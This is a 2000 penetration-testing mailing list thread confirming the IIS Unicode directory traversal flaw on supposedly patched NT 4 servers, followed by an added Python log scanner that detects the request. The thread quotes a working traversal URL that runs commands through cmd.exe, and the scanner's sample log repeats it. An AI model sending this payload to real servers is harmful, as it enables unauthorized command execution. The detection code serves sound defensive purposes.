Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: "Moonen, Ralph" <Moonen.Ralph () KPMG NL>
Date: Wed, 1 Nov 2000 14:24:09 +0100
I can confirm that this works on a system that is supposedly patched. Seems like there's somethin' strange going bump in the night.
-----Original Message-----
From: Unicraft Systems [mailto:unicraft () OTERO CL]
Sent: Wednesday, November 01, 2000 12:47 AM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings

--- Virus checked ---

It works for me too!!! =)
This was tested on an NT 4 SP6 server.
Regards, DonSata

-----Original Message-----
From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM] On Behalf Of Mike Ahern
Sent: Tuesday, October 31, 2000 8:14 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings

Vitaly Osipov [vos () TELENOR CZ] wrote:

Hmm... I see some *very* strange strings in your examples below... the second escaped symbol (%pc for example) is not real escaped hex-code - if it works, then the problem is not in Unicode at all, but in something else

---------------------------
Trust Me, It Works!!!

Which is interesting since at least one system reported as patched appears to be still vulnerable. I had assumed the admin either didn't patch, or used the wrong hotfix. Perhaps that is not the case...

The Proof is in the Pudding:
----------------------------
http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\

Directory of c:\
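Added example, not part of the original thread or any poster's code: a log check for the request shape discussed above, flagging paths that contain a `%` not followed by two hex digits (the `%pc` Vitaly Osipov points out), a `%c0`/`%c1` escape (bytes that are never valid UTF-8 lead bytes), or a `..` segment. The four-field log format, client addresses and benign sample lines are constructed for illustration; only the flagged request path is taken from the message.

```python
import re

# '%' that is not followed by two hex digits is not a valid percent-escape.
MALFORMED_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")
# 0xC0 and 0xC1 could only begin overlong two-byte sequences, so they never
# occur in well-formed UTF-8.
INVALID_LEAD = re.compile(r"%[cC][01]")

# Constructed sample log, simplified to: client method uri status
SAMPLE_LOG = [
    r"192.0.2.10 GET /default.htm 200",
    r"192.0.2.10 GET /docs/100%25-uptime.htm 200",
    r"192.0.2.44 GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 200",
    r"192.0.2.51 GET /images/caf%c3%a9.gif 200",
]

def classify_path(path):
    """Return the reasons a raw (undecoded) request path looks suspicious."""
    reasons = []
    if MALFORMED_ESCAPE.search(path):
        reasons.append("malformed-percent-escape")
    if INVALID_LEAD.search(path):
        reasons.append("invalid-utf8-lead-byte")
    if ".." in path:
        reasons.append("dot-dot-segment")
    return reasons

def scan(log_lines):
    """Return (client, path, status, reasons) for every flagged request."""
    hits = []
    for line in log_lines:
        client, _method, uri, status = line.split()
        path = uri.split("?", 1)[0]  # inspect the path, not the query string
        reasons = classify_path(path)
        if reasons:
            hits.append((client, path, status, reasons))
    return hits

if __name__ == "__main__":
    for client, path, status, reasons in scan(SAMPLE_LOG):
        # A 2xx status on a flagged path means the server answered the
        # request instead of rejecting it, so review those hits first.
        print(client, status, path, ",".join(reasons))
```

The check runs on the raw request line before any decoding, which is why the valid `%25` and `%c3%a9` escapes in the benign lines are not flagged.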